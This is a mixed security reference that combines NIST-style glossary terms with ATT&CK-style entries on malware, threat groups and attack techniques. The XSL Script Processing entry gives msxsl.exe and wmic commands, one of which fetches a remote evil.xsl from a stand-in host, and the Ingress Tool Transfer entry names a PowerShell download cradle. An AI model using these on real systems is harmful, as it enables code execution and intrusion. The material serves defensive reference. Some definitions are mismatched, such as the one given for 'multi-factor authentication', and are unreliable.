Description: Helminth is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via a macros in Excel spreadsheets, and one that is a standalone Windows executable.

Term: fresh random value
Definition: A previously unused output of a random bit generator.

Term: KiB
Definition: Kibi Byte, Measuring Unit 2<sup>10</sup> Bytes = 1024 Bytes

Term: compromise
Definition: The unauthorized disclosure, modification, substitution, or use of sensitive information (e.g., a secret key, private key or secret metadata).

Term: Identity Provider (IdP)
Definition: See Credential Service Provider.

Term: <em>Estimator</em>
Definition: A technique for estimating the value of a parameter.

Term: central services node
Definition: The Key Management Infrastructure core node that provides central security management and data management services.

Term: Mail Transfer Agent (MTA)
Definition: A program running on a mail server that receives messages from mail user agents or other MTAs and either forwards them to another MTA or, if the recipient is on the MTA, delivers the message to the local delivery agent (LDA) for delivery to the recipient. Common MTAs include Microsoft Exchange and sendmail.

Term: Password Cracking
Definition: The process of recovering secret passwords stored in a computer system or transmitted over a network.

Term: IT System
Definition: Discrete set of information resources organized for the collection, processing, maintenance, use, sharing, dissemination, or disposition of information.

Name: Malteiro
Type: intrusion-set
Description: Malteiro is a financially motivated criminal group that is likely based in Brazil and has been active since at least November 2019. The group operates and distributes the Mispadu banking trojan via a Malware-as-a-Service (MaaS) business model. Malteiro mainly targets victims throughout Latin America (particularly Mexico) and Europe (particularly Spain and Portugal).

Term: Key wrapping
Definition: A method of cryptographically protecting the confidentiality and integrity of keys using a symmetric-key algorithm.

Term: quadratic twist
Definition: Certain elliptic curve related to a specified elliptic curve.

Term: insider
Definition: Any person with authorized access to any organizational resource, to include personnel, facilities, information, equipment, networks, or systems.

Term: [<i>T</i>]<sub>2</sub>
Definition: An integer T represented as a binary string (denoted by the “2”) with a length specified by the function, an algorithm, or a protocol which uses T as an input.

Term: Data Encryption Standard
Definition: Data Encryption Standard specified in FIPS 46-3

Name: Valid Accounts
Type: attack-pattern
Description: Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.

The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.

Term: key
Definition: <p>A parameter used in conjunction with a cryptographic algorithm that determines its operation. Examples of cryptographic algorithms applicable to this standard include:</p><p>1. The computation of a digital signature from data</p><p>2. The verification of a digital signature</p>

Term: <em>r</em>
Definition: The number of blocks in the formatted input data (N, A, P).

Term: mandatory access control (MAC)
Definition: An access control policy that is uniformly enforced across all subjects and objects within the boundary of an information system. A subject that has been granted access to information is constrained from doing any of the following: (i) passing the information to unauthorized subjects or objects; (ii) granting its privileges to other subjects; (iii) changing one or more security attributes on subjects, objects, the information system, or system components; (iv) choosing the security attributes to be associated with newly-created or modified objects; or (v) changing the rules governing access control. Organization-defined subjects may explicitly be granted organization-defined privileges (i.e., they are trusted subjects) such that they are not limited by some or all of the above constraints.

Term: Blockchain network user
Definition: Any single person, group, business, or organization which is using or operating a blockchain node.

Term: Computer Security Incident
Definition: See “incident.”

Name: Written Content
Type: attack-pattern
Description: Adversaries may create or tailor written materials to support targeting and malicious operations. Content may include phishing lures, fraudulent financial communications, fabricated job postings, fabricated employment credentials and documentation, decoy documents, social media persona content, and supporting narratives used to sustain fabricated personas over time. Content may be authored manually, commissioned through third parties, or produced using AI-assisted tools.

Written materials may impersonate legitimate government correspondence, diplomatic communications, or internal organizational documents to support targeting efforts. AI-assisted tools may also be used to tailor content to specific targets, industries, or regions. For example, adversaries may leverage AI to translate content into a target's native language or mimic the communication style of trusted senders.

Written content produced through these methods may be used in support of other techniques, such as Phishing, Spearphishing via Service, Phishing for Information, Internal Spearphishing, Social Engineering, Financial Theft, or Establish Accounts.

Written content does not include malicious code or scripts; for development of malicious code and scripts, see Develop Capabilities.

Term: FIPS
Definition: Federal Information Processing Standard.

Term: assurance of integrity
Definition: A measure of the trust that can be placed in the correctness of the information supplied by a PNT service provider. Integrity includes the ability of the system to provide timely warnings to users when the PNT data should not be used.

Term: OT
Definition: Programmable systems or devices that interact with the physical environment (or manage devices that interact with the physical environment). These systems/devices detect or cause a direct change through the monitoring and/or control of devices, processes, and events. Examples include industrial control systems, building management systems, fire control systems, and physical access control mechanisms.

Term: risk analysis
Definition: The process of identifying security risks, determining their magnitude, and identifying areas needing safeguards. Risk analysis is part of risk management.

Term: Peers
Definition: Entities at the same tier in a CKMS hierarchy (e.g., all peers are client nodes).

Term: Upgrading
Definition: An authorized increase in the level of protection to be provided to specified information, e.g., from a Low impact-level to a Moderate impact-level.

Term: hash value/result
Definition: See hash value.

Term: Port Scanner
Definition: A program that can remotely determine which ports on a system are open (e.g., whether systems allow connections through those ports).

Name: SHARPSTATS
Type: malware
Description: SHARPSTATS is a .NET backdoor used by MuddyWater since at least 2019.

Term: phase
Definition: The position of a point in time (instant) on a waveform cycle. A complete cycle is defined as the interval required for the waveform to retain its arbitrary initial value.

Name: Rifdoor
Type: malware
Description: Rifdoor is a remote access trojan (RAT) that shares numerous code similarities with HotCroissant.

Term: privacy preserving data mining
Definition: an [extension] of traditional data mining techniques to work with … data modified to mask sensitive information

Term: targeted poisoning attack
Definition: A poisoning attack that changes the prediction on a small num­ber of targeted samples.

Term: Incentive Mechanism
Definition: A means of providing blockchain network users an award for activities within the blockchain network (typically used as a system to reward successful publishing of blocks). Also known as incentive systems.

Term: EMM
Definition: Enterprise Mobility Management (EMM) systems are a common way of managing mobile devices in the enterprise. Although not a security technology by itself, EMMs can help to deploy policies to an enterprise’s device pool and to monitor device state.

Name: SpicyOmelette
Type: malware
Description: SpicyOmelette is a JavaScript based remote access tool that has been used by Cobalt Group since at least 2018.

Name: PoshC2
Type: tool
Description: PoshC2 is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.

Term: data validation
Definition: The process of determining that data or a process for collecting data is acceptable according to a predefined set of tests and the results of those tests.

Name: MEDUSA
Type: malware
Description: MEDUSA is an open-source rootkit that is capable of dynamic linker hijacking, command execution, and logging credentials.

Term: subject
Definition: An active entity, generally in the form of a person, process, or device, that causes information to flow among objects or changes the system state.

Name: Ragnar Locker
Type: malware
Description: Ragnar Locker is a ransomware that has been in use since at least December 2019.

Term: Privacy Control Assessor
Definition: See security control assessor or risk assessor.

Term: availability
Definition: The state that exists when data can be accessed or a requested service provided within an acceptable period of time.

Term: task
Definition: An activity that is directed toward the achievement of organizational objectives.

Name: Kimsuky
Type: intrusion-set
Description: Kimsuky is a Democratic People's Republic of Korea (DPRK)-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. Kimsuky has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. Kimsuky operations have overlapped with those of other North Korean state-sponsored cyber espionage actors as a result of ad hoc collaborations or other limited resource sharing. 

Kimsuky was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019). In 2023, Kimsuky was observed using commercial large language models (LLMs) to assist with vulnerability research, scripting, social engineering and reconnaissance.

DPRK threat actor cluster boundaries overlap in open source reporting, with some security researchers consolidating all attributed North Korean state-sponsored cyber activity under Lazarus Group, rather than tracking operationally distinct subgroups.

Term: MA
Definition: An application that requires special attention to security due to the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of the information in the application. Note: All federal applications require some level of protection. Certain applications, because of the information in them, however, require special management oversight and should be treated as major. Adequate security for other applications should be provided by security of the systems in which they operate.

Name: Deep Panda
Type: intrusion-set
Description: Deep Panda is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. The intrusion into healthcare company Anthem has been attributed to Deep Panda. This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. Deep Panda also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. Some analysts track Deep Panda and APT19 as the same group, but it is unclear from open source information if the groups are the same.

Name: StoneDrill
Type: malware
Description: StoneDrill is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with APT33.

Term: MAC algorithm
Definition: An algorithm that computes a MAC from a message and a key.

Term: multi-factor authentication
Definition: An entity that facilitates authentication of other entities attached to the same LAN using a public key certificate.

Name: IronNetInjector
Type: tool
Description: IronNetInjector is a Turla toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including ComRAT.

Term: System privacy requirement
Definition: System requirements that have privacy relevance. System privacy requirements define the protection capabilities provided by the system, the performance and behavioral characteristics exhibited by the system, and the evidence used to determine that the system privacy requirements have been satisfied.
Note Each system privacy requirement is expressed in a manner that makes verification possible via analysis, observation, test, inspection, measurement, or other defined and achievable means.

Name: Mustang Panda
Type: intrusion-set
Description: Mustang Panda is a China-based cyber espionage threat actor that has been conducting operations since at least 2012. Mustang Panda has been known to use tailored phishing lures and decoy documents to deliver malicious payloads. Mustang Panda has targeted government, diplomatic, and non-governmental organizations, including think tanks, religious institutions, and research entities, across the United States, Europe, and Asia, with notable activity in Russia, Mongolia, Myanmar, Pakistan, and Vietnam.

Term: conditioning function
Definition: A deterministic function used to reduce bias and/or improve the entropy per bit.

Name: Securityd Memory
Type: attack-pattern
Description: An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization. A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. Apple’s `securityd` utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.

Name: Hide Artifacts
Type: attack-pattern
Description: Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.

Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.

Name: Pass the Ticket
Type: attack-pattern
Description: Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

When preforming PtT, valid Kerberos tickets for Valid Accounts are captured by OS Credential Dumping. A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.

A Silver Ticket can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).

A Golden Ticket can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.

Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. Pass the Hash) while also using the password hash to create a valid Kerberos ticket.

Name: Ingress Tool Transfer
Type: attack-pattern
Description: Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer). 

On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, certutil, and PowerShell commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`. A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).

Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by User Execution (typically after interacting with Phishing lures).

Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system. In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.

Name: Rogue Domain Controller
Type: attack-pattern
Description: Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. 

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence.

Term: Communicating group
Definition: A set of communicating entities that employ cryptographic services and need cryptographic keying relationships to enable cryptographically protected communications.

Term: <em>X =? Y</em>
Definition: Check for the equality of X and Y.

Term: Regular Expression
Definition: A sequence of characters (or words) that forms a search pattern, mainly for use in pattern matching with strings, or string matching.

Term: Secure Messaging Key Authentication (SM-AUTH)
Definition: An authentication mechanism where the secure messaging key and associated certificate are used for authentication.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to cause the security of the system to be compromised.

Term: Quote
Definition: To precede printable non-alphanumeric characters (e.g., *, $, ?) with the backslash ( \) escape character in a value string. When a non-alphanumeric character is quoted in a WFN, it SHALL be processed as string data. When a non-alphanumeric character is unquoted in a WFN, it may be interpreted as a special character by CPE 2.3 specifications, including this one.

Name: ToddyCat
Type: intrusion-set
Description: ToddyCat is a sophisticated threat group that has been active since at least 2020 using custom loaders and malware in multi-stage infection chains against government and military targets across Europe and Asia.

Term: system of records
Definition: “A group of any records under the control of any agency from which information is retrieved by the name of the individual or by some identifying number, symbol, or other identifying particular assigned to the individual.”

Term: Incomplete Gamma Function
Definition: The incomplete gamma function Q(a,x) is defined in Section 5.5.3.

Term: Object, Assessment
Definition: See Object, Assessment.

Term: pseudorandom number generator
Definition: A deterministic algorithm which, given a truly random binary sequence of length k, outputs a binary sequence of length l >> k which appears to be random. The input to the generator is called the seed, while the output is called a pseudorandom bit sequence.

Term: Layered Binary Label
Definition: Label that has only one design and is applied to IoT products that meet appropriate requirements but allows for unique layers that provide specific information about the IoT product (e.g., URL or scannable code).

Term: message authentication code (MAC)
Definition: A cryptographic checksum on data that uses a symmetric key to detect both accidental and intentional modifications of the data. 
See checksum.

Term: sanitization
Definition: Actions taken to render data written on media unrecoverable by both ordinary and, for some forms of sanitization, extraordinary means.

Term: discussion
Definition: Statements used to provide additional explanatory information for controls, control enhancements, security requirements, or enhanced security requirements.

Term: CPO
Definition: A senior official designated by the head of each agency to have agency-wide responsibilities for privacy, including the implementation of privacy protections; compliance with federal laws, regulations, and policies related to privacy; the management of privacy risks at the agency; and a central policy-making role in the agency’s development and evaluation of legislative, regulatory, and other policy proposals.

Name: Rootkit
Type: attack-pattern
Description: Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. 

Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor or System Firmware. Rootkits have been seen for Windows, Linux, and Mac OS X systems. 

Rootkits that reside or modify boot sectors are known as Bootkits and specifically target the boot process of the operating system.

Term: DSIG
Definition: The result of a transformation of a message by means of a cryptographic system using keys such that a Relying Party can determine: (1) whether the transformation was created using the private key that corresponds to the public key in the signer’s digital certificate; and (2) whether the message has been altered since the transformation was made.

Term: protocol adapter (PA)
Definition: A process that communicates with entities external to a system. Protocol adapters typically implement Open Systems Interconnection (OSI) model layers 5-7.

Term: Run
Definition: An uninterrupted sequence of like bits (i.e., either all zeroes or all ones).

Term: Round
Definition: A sequence of transformations of the state that is iterated&nbsp;<span class="math-tex">\(Nr\)</span>&nbsp;times in the specifications of CIPHER(), INVCIPHER(), and EQINVCIPHER(). The sequence consists of four transformations, except for one iteration, in which one of the transformations is omitted.

Term: vulnerability scanner
Definition: (As used in this volume) A network tool (hardware and/or software) that scans network devices to identify generally known and organization specific CVEs. It may do this based on a wide range of signature strategies.

Term: product
Definition: A software application that has one or more capabilities.

Term: <em>Mn*</em>
Definition: The final block, possibly a partial block, of the formatted message.

Term: PDP
Definition: Computes access decisions by evaluating the applicable digital policies and metapolicies. One of the main functions of the PDP is to mediate or deconflict digital policies according to metapolicies.

Term: ciphertext
Definition: With regard to KEMs, a bit string that is produced by the encapsulation algorithm and used as an input to the decapsulation algorithm.

Term: Identifier CPE Name
Definition: A bound representation of a CPE WFN that uniquely identifies a single product class. Also referred to as an “identifier name”.

Term: Imaging
Definition: The process used to obtain a bit by bit copy of data residing on the original electronic media; allows the investigator to review a duplicate of the original evidence while preserving that evidence

Term: cloud computing
Definition: A model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction.

Term: cyber resiliency engineering practice
Definition: A method, process, modeling technique, or analytical technique used to identify and analyze cyber resiliency solutions.

Term: Data Processing
Definition: The collective set of data actions-that is, the complete data life cycle, including, but not limited to: collection, retention, logging, generation, transformation, use, disclosure, sharing, transmission, and disposal.

Term: <em>rv</em>
Definition: The random value that is combined with the message Ms to produce the randomized message M.

Name: Pikabot Distribution February 2024
Type: campaign
Description: Pikabot was distributed in Pikabot Distribution February 2024 using malicious emails with embedded links leading to malicious ZIP archives requiring user interaction for follow-on infection. The version of Pikabot distributed featured significant changes over the 2023 variant, including reduced code complexity and simplified obfuscation mechanisms.

Name: XSL Script Processing
Type: attack-pattern
Description: Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. 

Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft common line transformation utility binary (msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.

Command-line examples:

* <code>msxsl.exe customers[.]xml script[.]xsl</code>
* <code>msxsl.exe script[.]xsl script[.]xsl</code>
* <code>msxsl.exe script[.]jpeg script[.]jpeg</code>

Another variation of this technique, dubbed “Squiblytwo”, involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file. This technique can also execute local/remote scripts and, similar to its Regsvr32/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.

Command-line examples:

* Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
* Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>

Term: cloud infrastructure
Definition: the collection of hardware and software that enables the five essential characteristics of cloud computing. The cloud infrastructure can be viewed as containing both a physical layer and an abstraction layer. The physical layer consists of the hardware resources that are necessary to support the cloud services being provided, and typically includes server, storage and network components. The abstraction layer consists of the software deployed across the physical layer, which manifests the essential cloud characteristics. Conceptually the abstraction layer sits above the physical layer.

Term: network
Definition: Information system(s) implemented with a collection of interconnected components. Such components may include routers, hubs, cabling, telecommunications controllers, key distribution centers, and technical control devices.

Term: authorizing official designated representative
Definition: An organizational official acting on behalf of an authorizing official in carrying out and coordinating the required activities associated with security authorization.

Term: Access Control Policy
Definition: Policies that describe who is allowed to access the data and/or which parts of the data.

Term: Key-derivation key
Definition: A key used as an input to a key derivation function to derive other keys.

Name: Hide Infrastructure
Type: attack-pattern
Description: Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished by identifying and filtering traffic from defensive tools, masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers, and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely.

C2 networks may include the use of Proxy or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.

Adversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents. Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., Virtualization/Sandbox Evasion).

Hiding C2 infrastructure may also be supported by Resource Development activities such as Acquire Infrastructure and Compromise Infrastructure. For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.

Term: <em>TW-1(C)</em>
Definition: The output of the unwrapping function for TKW applied to the string C.

Term: <em>C#j</em>
Definition: The jth ciphertext segment.

Term: identity
Definition: An attribute or set of attributes that uniquely describe a subject within a given context.

Term: Virtual Machine (VM)
Definition: A simulated environment created by virtualization.

Term: Global Information Grid
Definition: The globally interconnected, end-to-end set of information capabilities for collecting, processing, storing, disseminating, and managing information on demand to warfighters, policy makers, and support personnel. The GIG includes owned and leased communications and computing systems and services, software (including applications), data, security services, other associated services, and National Security Systems. Non-GIG information technology (IT) includes stand-alone, self-contained, or embedded IT that is not, and will not be, connected to the enterprise network. 
Rationale: Term has been replaced by the term “Department of Defense information networks (DODIN)”.

Term: Dictionary User
Definition: An organization, individual, product, or service that consumes a CPE dictionary for any purpose.

Term: Security Authorization
Definition: The right or a permission that is granted to a system entity to access a system resource.

Term: Quantitative Assessment
Definition: Use of a set of methods, principles, or rules for assessing risks based on the use of numbers where the meanings and proportionality of values are maintained inside and outside the context of the assessment.

Term: asymmetric cryptography
Definition: Cryptography that uses two separate keys to exchange data — one to encrypt or digitally sign the data and one to decrypt the data or verify the digital signature. Also known as public-key cryptography.

Name: Downgrade System Image
Type: attack-pattern
Description: Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. 

On embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.

Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as Weaken Encryption. Downgrading of a system image can be done on its own, or it can be used in conjunction with Patch System Image.

Term: Active state
Definition: A lifecycle state for a key in which the key may be used to cryptographically protect information (e.g., encrypt plaintext or generate a digital signature), to cryptographically process previously protected information (e.g., decrypt ciphertext or verify a digital signature) or both.

Name: BS2005
Type: malware
Description: BS2005 is malware that was used by Ke3chang in spearphishing campaigns since at least 2011.

Name: Limit Hardware Installation
Type: course-of-action
Description: Prevent unauthorized users or groups from installing or using hardware, such as external drives, peripheral devices, or unapproved internal hardware components, by enforcing hardware usage policies and technical controls. This includes disabling USB ports, restricting driver installation, and implementing endpoint security tools to monitor and block unapproved devices. This mitigation can be implemented through the following measures:

Disable USB Ports and Hardware Installation Policies:

- Use Group Policy Objects (GPO) to disable USB mass storage devices:
 - Navigate to Computer Configuration > Administrative Templates > System > Removable Storage Access.
 - Deny write and read access to USB devices.
- Whitelist approved devices using unique serial numbers via Windows Device Installation Policies.

Deploy Endpoint Protection and Device Control Solutions:

- Use tools like Microsoft Defender for Endpoint, Symantec Endpoint Protection, or Tanium to monitor and block unauthorized hardware.
- Implement device control policies to allow specific hardware types (e.g., keyboards, mice) and block others.

Harden BIOS/UEFI and System Firmware:

- Set strong passwords for BIOS/UEFI access.
- Enable Secure Boot to prevent rogue hardware components from loading unauthorized firmware.

Restrict Peripheral Devices and Drivers:

- Use Windows Device Manager Policies to block installation of unapproved drivers.
- Monitor hardware installation attempts through endpoint monitoring tools.

Disable Bluetooth and Wireless Hardware:

- Use GPO or MDM tools to disable Bluetooth and Wi-Fi interfaces across systems.
- Restrict hardware pairing to approved devices only.

Logging and Monitoring:

- Enable logging for hardware installation events in Windows Event Logs (Event ID 20001 for Device Setup Manager).
- Use SIEM solutions (e.g., Splunk, Elastic Stack) to detect unauthorized hardware installation activities.

*Tools for Implementation*

USB and Device Control:

- Microsoft Group Policy Objects (GPO)
- Microsoft Defender for Endpoint
- Symantec Endpoint Protection
- McAfee Device Control

Endpoint Monitoring:

- EDRs
- OSSEC (open-source host-based IDS)

Hardware Whitelisting:

- BitLocker for external drives (Windows)
- Windows Device Installation Policies
- Device Control 

BIOS/UEFI Security:

- Secure Boot (Windows/Linux)
Firmware management tools like Dell Command Update or HP Sure Start

Term: distributed self-assessment
Definition: The least formal type of assessment, the element judgments are based on the evaluations by small groups that work in parallel.

Name: C0011
Type: campaign
Description: C0011 was a suspected cyber espionage campaign conducted by Transparent Tribe that targeted students at universities and colleges in India. Security researchers noted this campaign against students was a significant shift from Transparent Tribe's historic targeting Indian government, military, and think tank personnel, and assessed it was still ongoing as of July 2022.

Term: Hash rate
Definition: The number of cryptographic hash functions a processor can calculate in a given time, usually denominated as hashes per second.

Term: Decryption
Definition: The process of changing ciphertext into plaintext.

Term: max(x1, …, xn)
Definition: The maximum of the xi values

Term: applicant
Definition: An individual applying for a PIV Card.

Name: XDG Autostart Entries
Type: attack-pattern
Description: Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.

Adversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the `Exec` directive in the `.desktop` configuration file. When the user’s desktop environment is loaded at user login, the `.desktop` files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the `/etc/xdg/autostart` directory while the user entries are located in the `~/.config/autostart` directory.

Adversaries may combine this technique with Masquerading to blend malicious Autostart entries with legitimate programs.

Term: media sanitization
Definition: The actions taken to render data written on media unrecoverable by both ordinary and extraordinary means.

Term: Partition
Definition: A logical portion of a media that functions as though it were physically separate from other logical portions of the media.

Term: Collateral Damage Potential
Definition: measures the potential for loss of life or physical assets through damage or theft of property or equipment.

Term: capability requirement
Definition: A type of requirement describing the capability that the organization or system must provide to satisfy a stakeholder need. Note: Capability requirements relted to information security and privacy are derived from stakeholder protection needs and the corresponding security and privacy requirements.

Term: HMAC
Definition: Keyed-Hash Message Authentication Code specified in [FIPS198].

Term: ISCM Capability
Definition: A security capability with the following additional traits: 
• The purpose (desired result) of each capability is to address specific kind(s) of attack scenarios or exploits. 
• Each capability focuses on attacks towards specific assessment objects. 
• There is a viable way to automate ISCM on the security capability. 
• The capability provides protection against current attack scenarios.

Term: GW
Definition: An intermediate system (interface, relay) that attaches to two (or more) computer networks that have similar functions but dissimilar implementations and that enables either one-way or two-way communication between the networks.

Term: access control
Definition: The process of granting or denying specific requests to: (i) obtain and use information and related information processing services; and (ii) enter specific physical facilities (e.g., Federal buildings, military establishments, and border-crossing entrances).

Name: Network Device Authentication
Type: attack-pattern
Description: Adversaries may use Patch System Image to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.

Modify System Image may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.

Term: Block Frequency Test
Definition: The purpose of the block frequency test is to determine whether the number of ones and zeros in each of M non-overlapping blocks created from a sequence appear to have a random distribution.

Term: supportive relationship mapping
Definition: An OLIR that indicates how a supporting concept can or does help achieve a supported concept, with one of the concepts being a Focal Document Element and the other a Reference Document Element.

Term: SC
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in CNSSI No.1253 for national security systems and in FIPS 199 for other than national security systems.

Name: Archive via Library
Type: attack-pattern
Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including Python rarfile , libzip , and zlib . Most libraries include functionality to encrypt and/or compress data.

